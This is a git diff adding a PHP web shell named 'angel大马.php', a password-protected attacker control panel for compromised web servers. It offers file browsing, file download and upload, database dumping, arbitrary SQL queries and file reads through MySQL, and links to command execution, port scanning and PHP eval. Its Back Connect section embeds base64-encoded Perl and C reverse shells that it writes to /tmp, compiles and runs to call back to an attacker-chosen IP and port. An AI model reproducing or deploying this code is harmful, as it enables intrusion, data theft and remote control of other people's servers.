diff --git a/php/angel大马.php b/php/angel大马.php new file mode 100644 index 0000000..25bf5ed --- /dev/null +++ b/php/angel大马.php @@ -0,0 +1,2144 @@ + $value) { + if (IS_GPC) { + $value = s_array($value); + } + $$key = $value; +} +/*===================== ³ÌÐòÅäÖà =====================*/ + +//echo encode_pass('angel');exit; +//angel = ec38fe2a8497e0a8d6d349b3533038cb +// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë,Áô¿ÕΪ²»ÐèÒªÑéÖ¤ +$pass = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel + +//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ +// cookie ǰ׺ +$cookiepre = ''; +// cookie ×÷ÓÃÓò +$cookiedomain = ''; +// cookie ×÷Ó÷¾¶ +$cookiepath = '/'; +// cookie ÓÐЧÆÚ +$cookielife = 86400; + +//³ÌÐòËÑË÷¿ÉдÎļþµÄÀàÐÍ +!$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp'; +/*===================== ÅäÖýáÊø =====================*/ + +$charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8'); +if ($charset == 'utf8') { + header("content-Type: text/html; charset=utf-8"); +} elseif ($charset == 'big5') { + header("content-Type: text/html; charset=big5"); +} elseif ($charset == 'gbk') { + header("content-Type: text/html; charset=gbk"); +} elseif ($charset == 'latin1') { + header("content-Type: text/html; charset=iso-8859-2"); +} elseif ($charset == 'euc-kr') { + header("content-Type: text/html; charset=euc-kr"); +} elseif ($charset == 'euc-jp') { + header("content-Type: text/html; charset=euc-jp"); +} + +$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; +$timestamp = time(); + +/*===================== Éí·ÝÑéÖ¤ =====================*/ +if ($action == "logout") { + scookie('loginpass', '', -86400 * 365); + @header('Location: '.$self); + exit; +} +if($pass) { + if ($action == 'login') { + if ($pass == encode_pass($password)) { + scookie('loginpass',encode_pass($password)); + @header('Location: '.$self); + exit; + } + } + if ($_COOKIE['loginpass']) { + if ($_COOKIE['loginpass'] != $pass) { + loginpage(); + } + } else { + loginpage(); + } +} +/*===================== ÑéÖ¤½áÊø =====================*/ + +$errmsg = ''; +!$action && $action = 'file'; + +// ²é¿´PHPINFO +if ($action == 'phpinfo') { + if (IS_PHPINFO) { + phpinfo(); + exit; + } else { + $errmsg = 'phpinfo() function has non-permissible'; + } +} + +// ÏÂÔØÎļþ +if ($doing == 'downfile' && $thefile) { + if (!@file_exists($thefile)) { + $errmsg = 'The file you want Downloadable was nonexistent'; + } else { + $fileinfo = pathinfo($thefile); + header('Content-type: application/x-'.$fileinfo['extension']); + header('Content-Disposition: attachment; filename='.$fileinfo['basename']); + header('Content-Length: '.filesize($thefile)); + @readfile($thefile); + exit; + } +} + +// Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â +if ($doing == 'backupmysql' && !$saveasfile) { + if (!$table) { + $errmsg ='Please choose the table'; + } else { + $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); + $filename = basename($dbname.'.sql'); + header('Content-type: application/unknown'); + header('Content-Disposition: attachment; filename='.$filename); + foreach($table as $k => $v) { + if ($v) { + sqldumptable($v); + } + } + mysql_close(); + exit; + } +} + +// ͨ¹ýMYSQLÏÂÔØÎļþ +if($doing=='mysqldown'){ + if (!$dbname) { + $errmsg = 'Please input dbname'; + } else { + $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); + if (!file_exists($mysqldlfile)) { + $errmsg = 'The file you want Downloadable was nonexistent'; + } else { + $result = q("select load_file('$mysqldlfile');"); + if(!$result){ + q("DROP TABLE IF EXISTS tmp_angel;"); + q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);"); + //ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__angel_1111111111_eof__µÄÎļþʱ²»ÍêÕûµÄÇé¿ö + q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';"); + $result = q("select content from tmp_angel"); + q("DROP TABLE tmp_angel"); + } + $row = @mysql_fetch_array($result); + if (!$row) { + $errmsg = 'Load file failed '.mysql_error(); + } else { + $fileinfo = pathinfo($mysqldlfile); + header('Content-type: application/x-'.$fileinfo['extension']); + header('Content-Disposition: attachment; filename='.$fileinfo['basename']); + header("Accept-Length: ".strlen($row[0])); + echo $row[0]; + exit; + } + } + } +} + +?> + + + +<?php echo $action.' - '.$_SERVER['HTTP_HOST'];?> + + + + +'opform')); +makehide('action', $action); +makehide('nowpath', $nowpath); +makehide('p1', $p1); +makehide('p2', $p2); +makehide('p3', $p3); +makehide('p4', $p4); +makehide('p5', $p5); +formfoot(); + +if(!function_exists('posix_getegid')) { + $user = @get_current_user(); + $uid = @getmyuid(); + $gid = @getmygid(); + $group = "?"; +} else { + $uid = @posix_getpwuid(@posix_geteuid()); + $gid = @posix_getgrgid(@posix_getegid()); + $user = $uid['name']; + $uid = $uid['uid']; + $group = $gid['name']; + $gid = $gid['gid']; +} + +?> + + + + + + + +
/ User: ()
+ PHP / Safe Mode: + Logout | + File Manager | + MYSQL Manager | + MySQL Upload & Download | + Execute Command | + PHP Variable | + Port Scan | + Security information | + Eval PHP Code + | Back Connect +
+'); + + p(''); + + //²é¿´ËùÓпÉдÎļþºÍĿ¼ + $dirdata=array(); + $filedata=array(); + + if ($view_writable == 'dir') { + $dirdata = GetWDirList($nowpath); + $filedata = array(); + } elseif ($view_writable == 'file') { + $dirdata = array(); + $filedata = GetWFileList($nowpath); + } elseif ($findstr) { + $dirdata = array(); + $filedata = GetSFileList($nowpath, $findstr, $re); + } else { + // Ŀ¼Áбí + //scandir()ЧÂʸü¸ß + $dirs=@opendir($dir); + while ($file=@readdir($dirs)) { + $filepath=$nowpath.$file; + if(@is_dir($filepath)){ + $dirdb['filename']=$file; + $dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); + $dirdb['dirchmod']=getChmod($filepath); + $dirdb['dirperm']=getPerms($filepath); + $dirdb['fileowner']=getUser($filepath); + $dirdb['dirlink']=$nowpath; + $dirdb['server_link']=$filepath; + $dirdata[]=$dirdb; + } else { + $filedb['filename']=$file; + $filedb['size']=sizecount(@filesize($filepath)); + $filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath)); + $filedb['filechmod']=getChmod($filepath); + $filedb['fileperm']=getPerms($filepath); + $filedb['fileowner']=getUser($filepath); + $filedb['dirlink']=$nowpath; + $filedb['server_link']=$filepath; + $filedata[]=$filedb; + } + }// while + unset($dirdb); + unset($filedb); + @closedir($dirs); + } + @sort($dirdata); + @sort($filedata); + $dir_i = '0'; + + p(''); + makehide('action','file'); + makehide('thefile'); + makehide('doing'); + makehide('dir',$nowpath); + + foreach($dirdata as $key => $dirdb){ + if($dirdb['filename']!='..' && $dirdb['filename']!='.') { + if($getdir && $getdir == $dirdb['server_link']) { + $attachsize = dirsize($dirdb['server_link']); + $attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown'; + } else { + $attachsize = 'Stat'; + } + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + $dir_i++; + } else { + if($dirdb['filename']=='..') { + p(''); + p(''); + p(''); + } + } + } + + p(''); + $file_i = '0'; + + foreach($filedata as $key => $filedb){ + if($filedb['filename']!='..' && $filedb['filename']!='.') { + $fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']); + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + $file_i++; + } + } + p(''); + p(''); + p('
+'createdir')); + makehide('newdirname'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'fileperm')); + makehide('newperm'); + makehide('pfile'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'copyfile')); + makehide('sname'); + makehide('tofile'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'rename')); + makehide('oldname'); + makehide('newfilename'); + makehide('dir',$nowpath); + formfoot(); + formhead(array('name'=>'fileopform', 'target'=>'_blank')); + makehide('action'); + makehide('opfile'); + makehide('dir'); + formfoot(); + formhead(array('name'=>'getsize')); + makehide('getdir'); + makehide('dir'); + formfoot(); + + $free = @disk_free_space($nowpath); + !$free && $free = 0; + $all = @disk_total_space($nowpath); + !$all && $all = 0; + $used = $all-$free; + p('

File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)

'); + + $cwd_links = ''; + $path = explode('/', $nowpath); + $n=count($path); + for($i=0;$i<$n-1;$i++) { + $cwd_links .= ''.$path[$i].'/'; + } + +?> + +
+ + + + + +
()
+ + + + + + + + + +Drives) { + echo '
'; + $DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk'); + $comma = ''; + foreach($obj->Drives as $drive) { + if ($drive->Path) { + p($comma.''.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')'); + $comma = '|'; + } + } + echo '
'; + } + } +?> +
+		'); + p('
'); + p('WebRoot'); + p(' | ScriptPath'); + p(' | View All'); + p(' | View Writable ( Directory'); + p(' | File )'); + p(' | Create Directory | Create File'); + + p('
Find string in files(current folder): Type: Regular expressions
 FilenameLast modifiedSizeChmod / PermsAction
'.$dirdb['filename'].''.$dirdb['mtime'].''.$attachsize.''); + p(''.$dirdb['dirchmod'].' / '); + p(''.$dirdb['dirperm'].''.$dirdb['fileowner'].'Rename
-Parent Directory
'.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? ''.$filedb['filename'].'' : $filedb['filename']).''.$filedb['mtime'].''.$filedb['size'].''); + p(''.$filedb['filechmod'].' / '); + p(''.$filedb['fileperm'].''.$filedb['fileowner'].''); + p('Down | '); + p('Copy | '); + p('Edit | '); + p('Rename'); + p('
 FilenameLast modifiedSizeChmod / PermsAction
Delete selected'.$dir_i.' directories / '.$file_i.' files
'); +}// end dir + +elseif ($action == 'sqlfile') { + if($doing=="mysqlupload"){ + $file = $_FILES['uploadfile']; + $filename = $file['tmp_name']; + if (file_exists($savepath)) { + m('The goal file has already existed'); + } else { + if(!$filename) { + m('Please choose a file'); + } else { + $fp=@fopen($filename,'r'); + $contents=@fread($fp, filesize($filename)); + @fclose($fp); + $contents = bin2hex($contents); + if(!$upname) $upname = $file['name']; + $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';"); + m($result ? 'Upload success' : 'Upload has failed: '.mysql_error()); + } + } + } +?> + +'MYSQL Information','name'=>'dbinfo')); + makehide('action','sqlfile'); + p('

'); + p('DBHost:'); + makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); + p(':'); + makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); + p('DBUser:'); + makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); + p('DBPass:'); + makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); + p('DBName:'); + makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname)); + p('DBCharset:'); + makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1)); + p('

'); + formfoot(); + p('
'); + p('

Upload file

'); + p('

This operation the DB user must has FILE privilege

'); + p('

Save path(fullpath): Choose a file: Upload

'); + p('

Download file

'); + p('

File: Download

'); + makehide('dbhost'); + makehide('dbport'); + makehide('dbuser'); + makehide('dbpass'); + makehide('dbname'); + makehide('charset'); + makehide('doing'); + makehide('action','sqlfile'); + p('
'); +} + +elseif ($action == 'mysqladmin') { + !$dbhost && $dbhost = 'localhost'; + !$dbuser && $dbuser = 'root'; + !$dbport && $dbport = '3306'; + $dbform = ''; + if(isset($dbhost)){ + $dbform .= "\n"; + } + if(isset($dbuser)) { + $dbform .= "\n"; + } + if(isset($dbpass)) { + $dbform .= "\n"; + } + if(isset($dbport)) { + $dbform .= "\n"; + } + if(isset($dbname)) { + $dbform .= "\n"; + } + if(isset($charset)) { + $dbform .= "\n"; + } + + if ($doing == 'backupmysql' && $saveasfile) { + if (!$table) { + m('Please choose the table'); + } else { + $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + $fp = @fopen($path,'w'); + if ($fp) { + foreach($table as $k => $v) { + if ($v) { + sqldumptable($v, $fp); + } + } + fclose($fp); + $fileurl = str_replace(SA_ROOT,'',$path); + m('Database has success backup to '.$path.''); + mysql_close(); + } else { + m('Backup failed'); + } + } + } + if ($insert && $insertsql) { + $keystr = $valstr = $tmp = ''; + foreach($insertsql as $key => $val) { + if ($val) { + $keystr .= $tmp.$key; + $valstr .= $tmp."'".addslashes($val)."'"; + $tmp = ','; + } + } + if ($keystr && $valstr) { + $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error()); + } + } + if ($update && $insertsql && $base64) { + $valstr = $tmp = ''; + foreach($insertsql as $key => $val) { + $valstr .= $tmp.$key."='".addslashes($val)."'"; + $tmp = ','; + } + if ($valstr) { + $where = base64_decode($base64); + $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error()); + } + } + if ($doing == 'del' && $base64) { + $where = base64_decode($base64); + $delete_sql = "DELETE FROM $tablename WHERE $where"; + $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error()); + } + + if ($tablename && $doing == 'drop') { + $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); + if (q("DROP TABLE $tablename")) { + m('Drop table of success'); + $tablename = ''; + } else { + m(mysql_error()); + } + } + + formhead(array('title'=>'MYSQL Manager')); + makehide('action','mysqladmin'); + p('

'); + p('DBHost:'); + makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); + p(':'); + makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); + p('DBUser:'); + makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); + p('DBPass:'); + makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); + p('DBCharset:'); + makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1)); + makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt')); + p('

'); + formfoot(); + + //²Ù×÷¼Ç¼ + formhead(array('name'=>'recordlist')); + makehide('doing'); + makehide('action','mysqladmin'); + makehide('base64'); + makehide('tablename'); + p($dbform); + formfoot(); + + //Ñ¡¶¨Êý¾Ý¿â + formhead(array('name'=>'setdbname')); + makehide('action','mysqladmin'); + p($dbform); + if (!$dbname) { + makehide('dbname'); + } + formfoot(); + + //Ñ¡¶¨±í + formhead(array('name'=>'settable')); + makehide('action','mysqladmin'); + p($dbform); + makehide('tablename'); + makehide('page',$page); + makehide('doing'); + formfoot(); + + $cachetables = array(); + $pagenum = 30; + $page = intval($page); + if($page) { + $start_limit = ($page - 1) * $pagenum; + } else { + $start_limit = 0; + $page = 1; + } + if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { + $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); + //»ñÈ¡Êý¾Ý¿âÐÅÏ¢ + $mysqlver = mysql_get_server_info(); + p('

MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'

'); + $highver = $mysqlver > '4.1' ? 1 : 0; + + //»ñÈ¡Êý¾Ý¿â + $query = q("SHOW DATABASES"); + $dbs = array(); + $dbs[] = '-- Select a database --'; + while($db = mysql_fetch_array($query)) { + $dbs[$db['Database']] = $db['Database']; + } + makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1)); + $tabledb = array(); + if ($dbname) { + p('

'); + p('Current dababase: '.$dbname.''); + if ($tablename) { + p(' | Current Table: '.$tablename.' [ Insert | Structure | Drop ]'); + } + p('

'); + mysql_select_db($dbname); + + $getnumsql = ''; + $runquery = 0; + if ($sql_query) { + $runquery = 1; + } + $allowedit = 0; + if ($tablename && !$sql_query) { + $sql_query = "SELECT * FROM $tablename"; + $getnumsql = $sql_query; + $sql_query = $sql_query." LIMIT $start_limit, $pagenum"; + $allowedit = 1; + } + p('
'); + p('

Run SQL query/queries on database '.$dbname.':

'); + makehide('tablename', $tablename); + makehide('action','mysqladmin'); + p($dbform); + p('
'); + if ($tablename || ($runquery && $sql_query)) { + if ($doing == 'structure') { + $result = q("SHOW FULL COLUMNS FROM $tablename"); + $rowdb = array(); + while($row = mysql_fetch_array($result)) { + $rowdb[] = $row; + } + p('

Structure

'); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + foreach ($rowdb as $row) { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + } + tbfoot(); + $result = q("SHOW INDEX FROM $tablename"); + $rowdb = array(); + while($row = mysql_fetch_array($result)) { + $rowdb[] = $row; + } + p('

Indexes

'); + p('
FieldTypeCollationNullKeyDefaultExtraPrivilegesComment
'.$row['Field'].''.$row['Type'].''.$row['Collation'].' '.$row['Null'].' '.$row['Key'].' '.$row['Default'].' '.$row['Extra'].' '.$row['Privileges'].' '.$row['Comment'].' 
'); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + foreach ($rowdb as $row) { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + } + tbfoot(); + } elseif ($doing == 'insert' || $doing == 'edit') { + $result = q('SHOW COLUMNS FROM '.$tablename); + while ($row = mysql_fetch_array($result)) { + $rowdb[] = $row; + } + $rs = array(); + if ($doing == 'insert') { + p('

Insert new line in '.$tablename.' table »

'); + } else { + p('

Update record in '.$tablename.' table »

'); + $where = base64_decode($base64); + $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1"); + $rs = mysql_fetch_array($result); + } + p(''); + p($dbform); + makehide('action','mysqladmin'); + makehide('tablename',$tablename); + p('
KeynameTypeUniquePackedSeq_in_indexFieldCardinalityCollationNullComment
'.$row['Key_name'].''.$row['Index_type'].''.($row['Non_unique'] ? 'No' : 'Yes').' '.($row['Packed'] === null ? 'No' : $row['Packed']).' '.$row['Seq_in_index'].''.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').' '.($row['Cardinality'] ? $row['Cardinality'] : 0).' '.$row['Collation'].' '.$row['Null'].' '.$row['Comment'].' 
'); + foreach ($rowdb as $row) { + if ($rs[$row['Field']]) { + $value = htmlspecialchars($rs[$row['Field']]); + } else { + $value = ''; + } + $thisbg = bg(); + p(''); + if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') { + p(''); + } else { + p(''); + } + } + if ($doing == 'insert') { + p(''); + } else { + p(''); + makehide('base64', $base64); + } + p('
'.$row['Field'].'
'.$row['Type'].'		'.$value.' 
'.$row['Field'].'
'.$row['Type'].'
'); + } else { + $querys = @explode(';',$sql_query); + foreach($querys as $num=>$query) { + if ($query) { + p("

Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."

"); + switch(qy($query)) + { + case 0: + p('

Error : '.mysql_error().'

'); + break; + case 1: + if (strtolower(substr($query,0,13)) == 'select * from') { + $allowedit = 1; + } + if ($getnumsql) { + $tatol = mysql_num_rows(q($getnumsql)); + $multipage = multi($tatol, $pagenum, $page, $tablename); + } + if (!$tablename) { + $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query))); + $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line); + preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches); + $tablename = $matches[1][0]; + } + + /*********************/ + $getfield = q("SHOW COLUMNS FROM $tablename"); + $rowdb = array(); + $keyfied = ''; //Ö÷¼ü×ֶΠ+ while($row = @mysql_fetch_assoc($getfield)) { + $rowdb[$row['Field']]['Key'] = $row['Key']; + $rowdb[$row['Field']]['Extra'] = $row['Extra']; + if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') { + $keyfied = $row['Field']; + } + } + /*********************/ + //Ö±½Óä¯ÀÀ±í°´ÕÕÖ÷¼ü½µÐòÅÅÁÐ + if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') { + $query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query); + } + + $result = q($query); + + p($multipage); + p(''); + p(''); + if ($allowedit) p(''); + $fieldnum = @mysql_num_fields($result); + for($i=0;$i<$fieldnum;$i++){ + $name = @mysql_field_name($result, $i); + $type = @mysql_field_type($result, $i); + $len = @mysql_field_len($result, $i); + p(""); + } + p(''); + + while($mn = @mysql_fetch_assoc($result)){ + $thisbg = bg(); + p(''); + $where = $tmp = $b1 = ''; + //Ñ¡È¡Ìõ¼þ×Ö¶ÎÓà + foreach($mn as $key=>$inside){ + if ($inside) { + //²éÕÒÖ÷¼ü¡¢Î¨Ò»ÊôÐÔ¡¢×Ô¶¯Ôö¼ÓµÄ×ֶΣ¬ÕÒµ½¾ÍÍ£Ö¹£¬·ñÔò×éºÏËùÓÐ×Ö¶Î×÷ΪÌõ¼þ¡£ + if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') { + $where = $key."='".addslashes($inside)."'"; + break; + } + $where .= $tmp.$key."='".addslashes($inside)."'"; + $tmp = ' AND '; + } + } + //¶ÁÈ¡¼Ç¼Óà + foreach($mn as $key=>$inside){ + $b1 .= ''; + } + $where = base64_encode($where); + + if ($allowedit) p(''); + + p($b1); + p(''); + unset($b1); + } + p(''); + if ($allowedit) p(''); + $fieldnum = @mysql_num_fields($result); + for($i=0;$i<$fieldnum;$i++){ + $name = @mysql_field_name($result, $i); + $type = @mysql_field_type($result, $i); + $len = @mysql_field_len($result, $i); + p(""); + } + p(''); + tbfoot(); + p($multipage); + break; + case 2: + $ar = mysql_affected_rows(); + p('

affected rows : '.$ar.'

'); + break; + } + } + } + } + } else { + $query = q("SHOW TABLE STATUS"); + $table_num = $table_rows = $data_size = 0; + $tabledb = array(); + while($table = mysql_fetch_array($query)) { + $data_size = $data_size + $table['Data_length']; + $table_rows = $table_rows + $table['Rows']; + $table['Data_length'] = sizecount($table['Data_length']); + $table_num++; + $tabledb[] = $table; + } + $data_size = sizecount($data_size); + unset($table); + p('
Action$name
$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? ' - PRIMARY' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? ' - Auto' : '')."
'.html_clean($inside).' Edit | Del
Action$name
$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? ' - PRIMARY' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? ' - Auto' : '')."
'); + p(''); + makehide('action','mysqladmin'); + p($dbform); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + p(''); + foreach ($tabledb as $key => $table) { + $thisbg = bg(); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + p(''); + } + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + if ($highver) { + p(''); + p(''); + } + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + p(''); + + p(""); + makehide('doing','backupmysql'); + formfoot(); + p("
 NameRowsData_lengthCreate_timeUpdate_timeEngineCollationOperate
'.$table['Name'].''.$table['Rows'].''.$table['Data_length'].''.$table['Create_time'].' '.$table['Update_time'].' '.$table['Engine'].''.$table['Collation'].'Insert | Structure | Drop
NameRowsData_lengthCreate_timeUpdate_timeEngineCollationOperate
 Total tables: '.$table_num.''.$table_rows.''.$data_size.' 
Save as file
"); + fr($query); + } + } + } + tbfoot(); + @mysql_close(); +}//end mysql + +elseif ($action == 'backconnect') { + !$yourip && $yourip = $_SERVER['REMOTE_ADDR']; + !$yourport && $yourport = '12345'; + $usedb = array('perl'=>'perl','c'=>'c'); + + $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". + "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". + "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". + "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". + "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". + "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". + "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". + "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". + "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". + "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". + "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". + "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". + "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". + "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; + + if ($start && $yourip && $yourport && $use){ + if ($use == 'perl') { + cf('/tmp/angel_bc',$back_connect); + $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &"); + } else { + cf('/tmp/angel_bc.c',$back_connect_c); + $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); + @unlink('/tmp/angel_bc.c'); + $res = execute("/tmp/angel_bc $yourip $yourport &"); + } + m("Now script try connect to $yourip port $yourport ..."); + } + + formhead(array('title'=>'Back Connect')); + makehide('action','backconnect'); + p('

'); + p('Your IP:'); + makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip)); + p('Your Port:'); + makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport)); + p('Use:'); + makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use)); + makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt')); + p('

